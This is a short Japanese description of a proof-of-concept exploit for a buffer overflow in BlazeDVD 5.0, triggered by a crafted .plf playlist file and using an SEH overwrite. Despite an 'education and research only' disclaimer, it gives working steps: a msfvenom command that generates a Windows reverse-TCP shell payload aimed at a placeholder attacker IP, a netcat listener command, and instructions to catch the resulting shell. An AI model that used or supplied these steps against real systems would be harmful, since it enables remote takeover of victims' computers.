
BlazeDVD バージョン 5.0 のバッファオーバーフロー脆弱性を、細工された .plf プレイリストファイルを介して標的とする Proof-of-Concept (PoC) エクスプロイトです。このエクスプロイトは SEH (構造化例外ハンドラ) の上書き を使用してコード実行を実現します。
.plf ファイルによるバッファオーバーフローこのコードは教育および研究目的のみです。このコードを不正に使用すると、現地法または国際法に違反する可能性があります。不適切な使用によって生じた損害については、一切責任を負いません。
このエクスプロイトは、悪意のある .plf ファイルを生成します。このファイルを BlazeDVD で開くと、バッファオーバーフローが発生し、SEH (構造化例外ハンドラ) が上書きされます。これにより、実行がリバースシェルペイロードにリダイレクトされます。
msfvenom でシェルコードを生成する
msfvenom を使用して、生形式のリバースシェルペイロードを作成し、不正な文字を回避します。
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
msfvenom の出力をエクスプロイトスクリプト内のシェルコードと置き換えます。
Netcat (リスナー) を起動する 別のターミナルで、選択したポート 8443 のリスニングを開始します:
nc -lvnp 8443
リバースシェルを取得する 成功した場合、リバースシェルがリスナーに接続されます。